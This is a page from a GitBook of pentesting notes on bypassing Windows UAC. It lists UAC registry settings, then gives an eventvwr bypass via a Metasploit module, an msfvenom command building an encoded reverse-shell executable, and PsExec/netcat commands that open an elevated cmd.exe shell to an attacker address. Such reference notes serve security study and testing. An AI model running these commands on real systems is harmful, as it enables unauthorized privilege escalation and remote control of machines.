📑
Security Notes
  • Readme
  • Resources
    • Useful sites
    • Metasploit
      • Searchsploit
      • Msfvenom
      • Meterpreter
    • Shells
    • Linux
      • Cron
      • Connection
      • Compilers
    • Windows
      • Kernel exploits table
    • Bruteforce
      • Checklist
      • John the Ripper
      • Hashcat
    • BOF
      • Assembly
    • Gaining access checklist
  • Cloud - AWS
    • Enumeration
    • References
    • Bucket S3
      • Public Bucket
      • AMI Files
      • File upload to RCE
    • EC2
      • cloud-init Exploits
      • SSRF To AWS Role compromise
      • Unencrypted EBS
    • IAM
      • Account Disclosure by resource policy
    • Lambda Function
      • Code Injection
      • Attacking APIs
    • VPC
      • Expose Resources
  • Networking
    • Nmap
      • Scan types
    • TCPDump
    • Port forwarding
    • Ports
      • 21 - FTP
      • 22 - SSH
      • 25 465 587 - SMTP
      • 53 - DNS
      • 110 995 - POP3
      • 111 - NFS
      • 113 - Ident
      • 123 - NTP
      • 135 137 139 - RPC
      • 143 993 - IMAP
      • 161 - SNMP
      • 389 - LDAP
      • 139 445 - SMB
      • 873 - Rsync
      • 6379 - Redis
      • 6667 - IRC
  • Linux PrivEsc
    • Checklist
    • Enumeration
      • Important files
      • Memory Dump
    • Privileges Exploitation
    • Wildcard Exploits
    • Sudo Exploits
    • Docker Container
    • Docker Groups
    • Common Exploits
  • Windows PrivEsc
    • Checklist
    • Enumeration
      • Important Files
    • Antivirus evasion tools
    • Unquoted paths
    • Always install elevated
    • Vulnerable services
    • Client side
    • Exploitable privileges
      • Juicy Potato
    • UAC bypass
    • Common Exploits
  • Active Directory
    • Introduction
    • Checklist
    • Enumeration
    • Enable RDP
    • Kerberos
    • Rubeus
    • Credentials harvesting
      • Domain Controller specific
    • Connection
    • Pass The Hash
    • Kerberoast
    • ASREProast
    • Tickets
  • Web Attacks
    • Checklist
    • Enumeration
      • URL bruteforcing
    • APIs and Fields
    • Authentication
    • Filter Evasion
      • Fuzzying and encoding
    • File Vulnerabilities
      • LFI List
      • PHP shells
    • RCE
    • Code Injection
    • Dependency Injection
    • Joomla
    • Wordpress
    • WebDAV
    • HTTP
    • XSS
      • DOM Based
      • Reflected
      • Filter Evasion
    • SSI
    • SSTI
    • RCE
    • CSRF
    • SQL injection
      • sqlmap
      • PostgreSQL
      • Oracle
      • MSSQL
      • MySQL
      • Login
    • XPath injection
    • XXE
    • CORS
  • MOBILE PENTESTING
    • Static Code Analysis
    • Dynamic Code Analysis
    • Network Traffic Analysis
Powered by GitBook
On this page
  • Check configuration
  • Registries
  • Eventvwr exploitation
  • Requirements
  • Exploitation
  • Create elevated reverse shell
  1. Windows PrivEsc

UAC bypass

Check configuration

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System

Registries

  • ConsentPromptBehaviorAdmin: UAC configuration [0x0 - 0x5]

  • EnableLUA: UAC enabled [0x0 / 0x1]

  • PromptOnSecureDesktop: show screen prompt [0x0 / 0x1]

Consent prompt behavior policies

DWORD

Policy

Description

0x00000000

Elevate without prompting

Allows privileged accounts to perform an operation that requires elevation without requiring consent or credentials.

0x00000001

Prompt for credentials on the secure desktop

When an operation requires elevation of privilege, the user is prompted on the secure desktop to enter a privileged (ex: administrator) user name and password. If the user enters valid credentials, the operation continues with the user's highest available privilege.

0x00000002

Prompt for consent on the secure desktop

When an operation requires elevation of privilege, the user is prompted on the secure desktop to select either Yes or No. If the user selects Yes, the operation continues with the user's highest available privilege.

0x00000003

Prompt for credentials

When an operation requires elevation of privilege, the user is prompted to enter an administrator user name and password. If the user enters valid credentials, the operation continues with the applicable privilege.

0x00000004

Prompt for consent

When an operation requires elevation of privilege, the user is prompted to select either Yes or No. If the user selects Yes, the operation continues with the user's highest available privilege.

0x00000005

Prompt for consent for non-Windows binaries (Default)

When an operation for a non-Microsoft application requires elevation of privilege, the user is prompted on the secure desktop to select either Yes or No. If the user selects Yes, the operation continues with the user's highest available privilege.

Eventvwr exploitation

Requirements

  • Windows 7, 8.1, 10

  • PromptOnSecureDesktop == 5

  • eventvwr.exe must exist and have self-elevating privileges

Exploitation

Exploit scripts

  • exploit/windows/local/bypassuac_eventvwr Metasploit module

Payload

msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f exe -e x86/shikata_ga_nai > payload.exe

Create elevated reverse shell

PsExec64.exe -i -accepteula -d -s ".\nc.exe <ip> <port> -e cmd.exe"
PsExec64.exe \\<machine> -accepteula -u <machine>\<user> -p <pass> ".\nc.exe <ip> <port> -e cmd.exe"
PreviousJuicy PotatoNextCommon Exploits

Last updated 4 years ago

. Don't forget to uncomment the strcat and GetCurrentDirectory commands and replace foobar.exe with your payload

Powershell script
C file